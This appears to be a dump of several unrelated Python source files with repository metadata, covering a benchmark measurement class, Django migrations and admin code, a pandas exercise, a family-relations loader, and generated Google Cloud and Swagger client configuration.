self._timestamp = timestamp or datetime.now()
def is_total(self):
return self._criterion == 'total'
@property
def criterion(self):
return self._criterion
@property
def value(self):
return self._value
@property
def unit(self):
return self._unit
@property
def timestamp(self):
return self._timestamp
@property
def run_id(self):
return self._run_id
TIME_FORMAT = "%Y-%m-%dT%H:%M:%S"
def as_str_list(self):
return ["[" + self._timestamp.strftime(self.TIME_FORMAT) + "]",
"%f" % self._value,
self._unit,
self._criterion] + self._run_id.as_str_list()
@classmethod
def from_str_list(cls, data_store, str_list):
timestamp = datetime.strptime(str_list[0][1:-1], cls.TIME_FORMAT)
value = float(str_list[1])
unit = str_list[2]
criterion = str_list[3]
run_id = RunId.from_str_list(data_store, str_list[4:])
return Measurement(value, unit, run_id, criterion, timestamp)
| [
"git@stefan-marr.de"
] | git@stefan-marr.de |
ce4e263dde23b1fdcc64494a2f9403ddfdfb1d07 | f5f40cee05de885ee059bcf4760e16f3f01ed23c | /ims/exceptions.py | c359b0a8626603fd8084e35af12b1dcce84a8c5e | [] | no_license | MarsWizard/imagebank | 68693207d71024bd0cdc608984d80fc0c7b6f751 | 916a9f087194052e77751fd8d52c930e77a7b04d | refs/heads/master | 2021-04-17T16:57:55.356760 | 2020-10-20T05:34:23 | 2020-10-20T05:34:23 | 249,460,889 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 452 | py | ERROR_OBJECT_NOT_FOUND = 10001
PARAMETER_REQUIRED = 10002
INVALID_IMAGE_FILE = 10003
class ImsException(BaseException):
def __init__(self, error_code, error_msg):
self.error_code = error_code
self.error_msg = error_msg
class InvalidImageFile(ImsException):
def __init__(self):
super(InvalidImageFile, self).__init__(INVALID_IMAGE_FILE,
'Invalid Image File') | [
"pbleester@gmail.com"
] | pbleester@gmail.com |
477f89560ab67fce9dddcc436863915129dc25bd | 707bd0e873ae25146f1341b40d8efbf5134025af | /unifypage/migrations/0004_auto_20161021_0933.py | 781e95f7baa886a438135233d4469070f9415423 | [] | no_license | yosmangel/djangoLn2x | 76acd748adfddb5b21ad3e0342e3d7eb19b81bc9 | 24d068458e8271aacfa98d762c0dc117e65d41cf | refs/heads/master | 2021-04-27T07:55:36.488176 | 2017-06-01T17:48:26 | 2017-06-01T17:48:26 | 122,641,881 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 600 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.10.2 on 2016-10-21 08:33
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('unifypage', '0003_auto_20161020_1746'),
]
operations = [
migrations.RemoveField(
model_name='row',
name='background_url',
),
migrations.AddField(
model_name='row',
name='background',
field=models.CharField(blank=True, max_length=500, verbose_name='Background'),
),
]
| [
"yosmangel_yk@hotmail.com"
] | yosmangel_yk@hotmail.com |
371df3e6878cc771e173581fde70c7a4c4345bbc | 10450b2dcc29b47c9773065db3b3767481b9cbe0 | /setindex.py | 78d78fbfef2ad9044dcab693df10fb6c2c009607 | [] | no_license | YukiKis/deepage | c6ff1e18a09a5a35cc4ee8b291c008493b4c92a3 | c9d0e4a0eabd97d425d941e59765757f595ee03d | refs/heads/master | 2023-01-23T02:39:38.655383 | 2020-12-09T15:33:06 | 2020-12-09T15:33:06 | 319,202,030 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 419 | py | # -*- coding: utf-8 -*-
"""
Created on Mon Dec 7 23:36:59 2020
@author: s1430
"""
import pandas as pd
df = pd.read_csv("sample_index.csv")
print(df)
print(df.set_index("state"))
print(df.set_index(["state", "age"]))
print(df.set_index(["state"], drop=False))
print(df.set_index(["state"], append=True))
print(df.set_index(["state"], inplace=True))
print(df)
print(df.set_index(["age"], verify_integrity=True)) | [
"s143068@gmail.com"
] | s143068@gmail.com |
027cf4e57a5d81205b343ce7fc1c856aeb43e5f9 | 0125a43527a0cd4775aa264401360037bbadf6c2 | /load_people_assigned.py | 35938303f6bec3d955ebe4c113892b8fc3ef0b15 | [] | no_license | HsiuPing/BMSE_2_HW5 | 34d69b47e115293a1a0972c0a3caf8cdb6563533 | 0846ef0df14df09a04c7b99e998ec03873b8bd29 | refs/heads/master | 2021-04-27T00:09:18.787201 | 2018-03-04T04:55:09 | 2018-03-04T04:55:09 | 123,758,146 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,396 | py | """ Main program that loads related people from a file
:Author: Arthur Goldberg <Arthur.Goldberg@mssm.edu>
:Date: 2018-02-21
:Copyright: 2018, Arthur Goldberg
:License: MIT
"""
import sys
import argparse
import logging
import related_person
from related_person import Gender, RelatedPerson, RelatedPersonError
class RawPersonRecord(object):
FIELDS = 5
def __init__(self, id, name, father_id, mother_id, gender, row):
self.id = id
self.name = name
self.father_id = father_id
self.mother_id = mother_id
self.gender = gender
self.row = row
@staticmethod
def make_from_line(line, row):
l = line.strip().split('\t')
if len(l) != RawPersonRecord.FIELDS:
raise ValueError("row {}: has {} fields, not {}".format(row, len(l), RawPersonRecord.FIELDS))
t = tuple(l + [row])
return RawPersonRecord(*t)
class LoadPeople(object):
NULL_ID = '0'
def __init__(self):
self.buffer = []
self.people_index = {}
@staticmethod
def all_people(people_index):
for id in sorted(people_index.keys()):
print(str(people_index[id]))
# todo: write phase1
def phase1(self):
# Phase 1:
parser = argparse.ArgumentParser()
parser.add_argument("infile", type=argparse.FileType('r'))
parser.add_argument("--outfile", '-o', type=argparse.FileType('a+'))
print(parser.parse_args())
return parser.parse_args()
def phase2(self):
# Phase 2:
row = 0
errors = []
bad_ids = set()
# todo: report failure to open and quit, or have file opened by command line parsing
args = self.phase1()
filename = args.infile
with filename as f:
for line in f:
row += 1
try:
self.buffer.append(RawPersonRecord.make_from_line(line, row))
except ValueError as e:
errors.append(str(e))
# check IDs, genders, & create RelatedPersons
for raw_person in self.buffer:
try:
# check for dupes
if raw_person.id in self.people_index:
bad_ids.add(raw_person.id)
del self.people_index[raw_person.id]
if raw_person.id in bad_ids:
raise RelatedPersonError("duplicate ID: {}".format(raw_person.id))
# todo: get and check gender
gender = Gender.get_gender(raw_person.gender)
# make RelatedPerson
related_person = RelatedPerson(raw_person.id, raw_person.name, gender)
self.people_index[raw_person.id] = related_person
except RelatedPersonError as e:
errors.append("row {}: {}".format(raw_person.row, str(e)))
bad_ids.add(raw_person.id)
if errors:
# todo: write to output determined by command line input
text_1 = '\n- individual errors -'
text_2 = '\n'.join(errors)
if args.outfile:
with args.outfile as o:
o.write(text_1 + text_2)
else:
print(text_1, text_2)
def check_parent(self, raw_person, parent):
if parent == 'mother':
if raw_person.mother_id != LoadPeople.NULL_ID:
if raw_person.mother_id not in self.people_index:
raise RelatedPersonError("{} missing mother {}".format(raw_person.id, raw_person.mother_id))
elif parent == 'father':
if raw_person.father_id != LoadPeople.NULL_ID:
if raw_person.father_id not in self.people_index:
raise RelatedPersonError("{} missing father {}".format(raw_person.id, raw_person.father_id))
def set_parent(self, raw_person, parent):
related_person = self.people_index[raw_person.id]
if parent == 'mother':
if raw_person.mother_id != LoadPeople.NULL_ID:
mother = self.people_index[raw_person.mother_id]
related_person.set_mother(mother)
elif parent == 'father':
if raw_person.father_id != LoadPeople.NULL_ID:
father = self.people_index[raw_person.father_id]
related_person.set_father(father)
def phase3(self):
# Phase 3:
errors = []
bad_ids = set()
args = self.phase1()
for raw_person in self.buffer:
if raw_person.id in self.people_index:
# todo: check that the parents of raw_person exist; use check_parent() to help
# set parents, which checks their gender
if raw_person.id not in bad_ids:
for parent in ['mother', 'father']:
try:
self.check_parent(raw_person, parent)
self.set_parent(raw_person, parent)
except RelatedPersonError as e:
errors.append("row {}: for {} {}".format(raw_person.row, raw_person.id, str(e)))
bad_ids.add(raw_person.id)
# delete all the RelatedPerson entries for the bad people
for bad_id in bad_ids:
del self.people_index[bad_id]
# todo: create a log entry for each RelatedPerson that is verified
logging.basicConfig(stream=sys.stdout, level=logging.INFO)
for id in self.people_index:
logging.info('ID:{} is successfully loaded.'.format(id), self.people_index[id])
if errors:
# todo: write to output determined by command line input
text_1 = '\n- relatedness errors -'
text_2 = '\n'.join(errors)
if args.outfile:
with args.outfile as o:
o.write(text_1 + text_2)
else:
print(text_1, text_2)
def main(self):
self.phase2()
self.phase3()
return self.people_index
# todo: use the input specified by the CLI
# Use command line such as python load_people_assigned.py test_bad.tsv -o output_error.txt
LoadPeople().main()
| [
"noreply@github.com"
] | HsiuPing.noreply@github.com |
f2b7180d176b4eec46c3794ea9526f5ec48beb91 | 228ebc9fb20f25dd3ed2a6959aac41fd31314e64 | /google/cloud/aiplatform_v1beta1/services/migration_service/transports/base.py | 3405e5f21603a2bae9a6b0b1b8a675b832545a71 | [
"Apache-2.0"
] | permissive | orionnye/python-aiplatform | 746e3df0c75025582af38223829faeb2656dc653 | e3ea683bf754832340853a15bdb0a0662500a70f | refs/heads/main | 2023-08-03T06:14:50.689185 | 2021-09-24T03:24:14 | 2021-09-24T03:24:14 | 410,091,957 | 1 | 0 | Apache-2.0 | 2021-09-24T20:21:01 | 2021-09-24T20:21:00 | null | UTF-8 | Python | false | false | 7,763 | py | # -*- coding: utf-8 -*-
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import abc
from typing import Awaitable, Callable, Dict, Optional, Sequence, Union
import packaging.version
import pkg_resources
import google.auth # type: ignore
import google.api_core # type: ignore
from google.api_core import exceptions as core_exceptions # type: ignore
from google.api_core import gapic_v1 # type: ignore
from google.api_core import retry as retries # type: ignore
from google.api_core import operations_v1 # type: ignore
from google.auth import credentials as ga_credentials # type: ignore
from google.oauth2 import service_account # type: ignore
from google.cloud.aiplatform_v1beta1.types import migration_service
from google.longrunning import operations_pb2 # type: ignore
try:
DEFAULT_CLIENT_INFO = gapic_v1.client_info.ClientInfo(
gapic_version=pkg_resources.get_distribution(
"google-cloud-aiplatform",
).version,
)
except pkg_resources.DistributionNotFound:
DEFAULT_CLIENT_INFO = gapic_v1.client_info.ClientInfo()
try:
# google.auth.__version__ was added in 1.26.0
_GOOGLE_AUTH_VERSION = google.auth.__version__
except AttributeError:
try: # try pkg_resources if it is available
_GOOGLE_AUTH_VERSION = pkg_resources.get_distribution("google-auth").version
except pkg_resources.DistributionNotFound: # pragma: NO COVER
_GOOGLE_AUTH_VERSION = None
class MigrationServiceTransport(abc.ABC):
"""Abstract transport class for MigrationService."""
AUTH_SCOPES = ("https://www.googleapis.com/auth/cloud-platform",)
DEFAULT_HOST: str = "aiplatform.googleapis.com"
def __init__(
self,
*,
host: str = DEFAULT_HOST,
credentials: ga_credentials.Credentials = None,
credentials_file: Optional[str] = None,
scopes: Optional[Sequence[str]] = None,
quota_project_id: Optional[str] = None,
client_info: gapic_v1.client_info.ClientInfo = DEFAULT_CLIENT_INFO,
always_use_jwt_access: Optional[bool] = False,
**kwargs,
) -> None:
"""Instantiate the transport.
Args:
host (Optional[str]):
The hostname to connect to.
credentials (Optional[google.auth.credentials.Credentials]): The
authorization credentials to attach to requests. These
credentials identify the application to the service; if none
are specified, the client will attempt to ascertain the
credentials from the environment.
credentials_file (Optional[str]): A file with credentials that can
be loaded with :func:`google.auth.load_credentials_from_file`.
This argument is mutually exclusive with credentials.
scopes (Optional[Sequence[str]]): A list of scopes.
quota_project_id (Optional[str]): An optional project to use for billing
and quota.
client_info (google.api_core.gapic_v1.client_info.ClientInfo):
The client info used to send a user-agent string along with
API requests. If ``None``, then default info will be used.
Generally, you only need to set this if you're developing
your own client library.
always_use_jwt_access (Optional[bool]): Whether self signed JWT should
be used for service account credentials.
"""
# Save the hostname. Default to port 443 (HTTPS) if none is specified.
if ":" not in host:
host += ":443"
self._host = host
scopes_kwargs = self._get_scopes_kwargs(self._host, scopes)
# Save the scopes.
self._scopes = scopes
# If no credentials are provided, then determine the appropriate
# defaults.
if credentials and credentials_file:
raise core_exceptions.DuplicateCredentialArgs(
"'credentials_file' and 'credentials' are mutually exclusive"
)
if credentials_file is not None:
credentials, _ = google.auth.load_credentials_from_file(
credentials_file, **scopes_kwargs, quota_project_id=quota_project_id
)
elif credentials is None:
credentials, _ = google.auth.default(
**scopes_kwargs, quota_project_id=quota_project_id
)
# If the credentials is service account credentials, then always try to use self signed JWT.
if (
always_use_jwt_access
and isinstance(credentials, service_account.Credentials)
and hasattr(service_account.Credentials, "with_always_use_jwt_access")
):
credentials = credentials.with_always_use_jwt_access(True)
# Save the credentials.
self._credentials = credentials
# TODO(busunkim): This method is in the base transport
# to avoid duplicating code across the transport classes. These functions
# should be deleted once the minimum required versions of google-auth is increased.
# TODO: Remove this function once google-auth >= 1.25.0 is required
@classmethod
def _get_scopes_kwargs(
cls, host: str, scopes: Optional[Sequence[str]]
) -> Dict[str, Optional[Sequence[str]]]:
"""Returns scopes kwargs to pass to google-auth methods depending on the google-auth version"""
scopes_kwargs = {}
if _GOOGLE_AUTH_VERSION and (
packaging.version.parse(_GOOGLE_AUTH_VERSION)
>= packaging.version.parse("1.25.0")
):
scopes_kwargs = {"scopes": scopes, "default_scopes": cls.AUTH_SCOPES}
else:
scopes_kwargs = {"scopes": scopes or cls.AUTH_SCOPES}
return scopes_kwargs
def _prep_wrapped_messages(self, client_info):
# Precompute the wrapped methods.
self._wrapped_methods = {
self.search_migratable_resources: gapic_v1.method.wrap_method(
self.search_migratable_resources,
default_timeout=None,
client_info=client_info,
),
self.batch_migrate_resources: gapic_v1.method.wrap_method(
self.batch_migrate_resources,
default_timeout=None,
client_info=client_info,
),
}
@property
def operations_client(self) -> operations_v1.OperationsClient:
"""Return the client designed to process long-running operations."""
raise NotImplementedError()
@property
def search_migratable_resources(
self,
) -> Callable[
[migration_service.SearchMigratableResourcesRequest],
Union[
migration_service.SearchMigratableResourcesResponse,
Awaitable[migration_service.SearchMigratableResourcesResponse],
],
]:
raise NotImplementedError()
@property
def batch_migrate_resources(
self,
) -> Callable[
[migration_service.BatchMigrateResourcesRequest],
Union[operations_pb2.Operation, Awaitable[operations_pb2.Operation]],
]:
raise NotImplementedError()
__all__ = ("MigrationServiceTransport",)
| [
"noreply@github.com"
] | orionnye.noreply@github.com |
5a30388c978d42ea4fa0fd92c353044d84de3910 | 0603abc3e7936a77ef399203341d416116077865 | /cli_lic/configuration.py | e83dd2632e0a9535502deef9ddcc45cde311ee01 | [] | no_license | novvv/api_lic | 97ddbe70c1b77171a2e3820b72a02ef3eba9e12c | ad00863818c18f84b556774205119102dbefb4dd | refs/heads/master | 2020-03-31T14:14:51.267998 | 2019-04-12T10:48:32 | 2019-04-12T10:48:32 | 152,286,300 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,083 | py | # coding: utf-8
"""
LICENSE API
No description provided (generated by Swagger Codegen https://github.com/swagger-api/swagger-codegen)
OpenAPI spec version: 1.0.19
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import urllib3
import sys
import logging
from six import iteritems
from six.moves import http_client as httplib
def singleton(cls, *args, **kw):
instances = {}
def _singleton():
if cls not in instances:
instances[cls] = cls(*args, **kw)
return instances[cls]
return _singleton
@singleton
class Configuration(object):
"""
NOTE: This class is auto generated by the swagger code generator program.
Ref: https://github.com/swagger-api/swagger-codegen
Do not edit the class manually.
"""
def __init__(self):
"""
Constructor
"""
# Default Base url
self.host = "http://localhost:8012/v1"
# Default api client
self.api_client = None
# Temp file folder for downloading files
self.temp_folder_path = None
# Authentication Settings
# dict to store API key(s)
self.api_key = {}
# dict to store API prefix (e.g. Bearer)
self.api_key_prefix = {}
# Username for HTTP basic authentication
self.username = ""
# Password for HTTP basic authentication
self.password = ""
# Logging Settings
self.logger = {}
self.logger["package_logger"] = logging.getLogger("cli_lic")
self.logger["urllib3_logger"] = logging.getLogger("urllib3")
# Log format
self.logger_format = '%(asctime)s %(levelname)s %(message)s'
# Log stream handler
self.logger_stream_handler = None
# Log file handler
self.logger_file_handler = None
# Debug file location
self.logger_file = None
# Debug switch
self.debug = False
# SSL/TLS verification
# Set this to false to skip verifying SSL certificate when calling API from https server.
self.verify_ssl = True
# Set this to customize the certificate file to verify the peer.
self.ssl_ca_cert = None
# client certificate file
self.cert_file = None
# client key file
self.key_file = None
# Proxy URL
self.proxy = None
# Safe chars for path_param
self.safe_chars_for_path_param = ''
@property
def logger_file(self):
"""
Gets the logger_file.
"""
return self.__logger_file
@logger_file.setter
def logger_file(self, value):
"""
Sets the logger_file.
If the logger_file is None, then add stream handler and remove file handler.
Otherwise, add file handler and remove stream handler.
:param value: The logger_file path.
:type: str
"""
self.__logger_file = value
if self.__logger_file:
# If set logging file,
# then add file handler and remove stream handler.
self.logger_file_handler = logging.FileHandler(self.__logger_file)
self.logger_file_handler.setFormatter(self.logger_formatter)
for _, logger in iteritems(self.logger):
logger.addHandler(self.logger_file_handler)
if self.logger_stream_handler:
logger.removeHandler(self.logger_stream_handler)
else:
# If not set logging file,
# then add stream handler and remove file handler.
self.logger_stream_handler = logging.StreamHandler()
self.logger_stream_handler.setFormatter(self.logger_formatter)
for _, logger in iteritems(self.logger):
logger.addHandler(self.logger_stream_handler)
if self.logger_file_handler:
logger.removeHandler(self.logger_file_handler)
@property
def debug(self):
"""
Gets the debug status.
"""
return self.__debug
@debug.setter
def debug(self, value):
"""
Sets the debug status.
:param value: The debug status, True or False.
:type: bool
"""
self.__debug = value
if self.__debug:
# if debug status is True, turn on debug logging
for _, logger in iteritems(self.logger):
logger.setLevel(logging.DEBUG)
# turn on httplib debug
httplib.HTTPConnection.debuglevel = 1
else:
# if debug status is False, turn off debug logging,
# setting log level to default `logging.WARNING`
for _, logger in iteritems(self.logger):
logger.setLevel(logging.WARNING)
# turn off httplib debug
httplib.HTTPConnection.debuglevel = 0
@property
def logger_format(self):
"""
Gets the logger_format.
"""
return self.__logger_format
@logger_format.setter
def logger_format(self, value):
"""
Sets the logger_format.
The logger_formatter will be updated when sets logger_format.
:param value: The format string.
:type: str
"""
self.__logger_format = value
self.logger_formatter = logging.Formatter(self.__logger_format)
def get_api_key_with_prefix(self, identifier):
"""
Gets API key (with prefix if set).
:param identifier: The identifier of apiKey.
:return: The token for api key authentication.
"""
if self.api_key.get(identifier) and self.api_key_prefix.get(identifier):
return self.api_key_prefix[identifier] + ' ' + self.api_key[identifier]
elif self.api_key.get(identifier):
return self.api_key[identifier]
def get_basic_auth_token(self):
"""
Gets HTTP basic authentication header (string).
:return: The token for basic HTTP authentication.
"""
return urllib3.util.make_headers(basic_auth=self.username + ':' + self.password)\
.get('authorization')
def auth_settings(self):
"""
Gets Auth Settings dict for api client.
:return: The Auth Settings information dict.
"""
return {
'auth_token':
{
'type': 'api_key',
'in': 'header',
'key': 'X-Auth-Token',
'value': self.get_api_key_with_prefix('X-Auth-Token')
},
}
def to_debug_report(self):
"""
Gets the essential information for debugging.
:return: The report for debugging.
"""
return "Python SDK Debug Report:\n"\
"OS: {env}\n"\
"Python Version: {pyversion}\n"\
"Version of the API: 1.0.19\n"\
"SDK Package Version: 1.0.0".\
format(env=sys.platform, pyversion=sys.version)
| [
"novvvster@gmail.com"
] | novvvster@gmail.com |
fad8117f1daed26a450221f93a2411e385332a25 | efd99210b16aa74040ae7caf938ae6843043eb37 | /community/admin.py | 381d8b709fb9a47ef17862ee11cd737978c85277 | [] | no_license | Bourkekev/ms4-power-fitness-gym | 6fd5465403e45ea0cc89650bf001a53069bc4b7a | fb4c6219a57d4ffe994739b4e80a20f12681225c | refs/heads/main | 2023-03-22T08:09:23.657835 | 2021-01-30T12:22:17 | 2021-01-30T12:22:17 | 310,539,738 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 565 | py | from django.contrib import admin
from .models import MessageTopic, MessagePost
class MessagePostAdmin(admin.ModelAdmin):
"""
Create the admin interface for Messages
"""
readonly_fields = (
'message',
'topic',
'created_at',
'updated_at',
'created_by',
'updated_by',
)
list_display = (
'message',
'topic',
'created_at',
'created_by',
)
ordering = ('-created_by',)
admin.site.register(MessageTopic)
admin.site.register(MessagePost, MessagePostAdmin)
| [
"bourkekev@gmail.com"
] | bourkekev@gmail.com |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.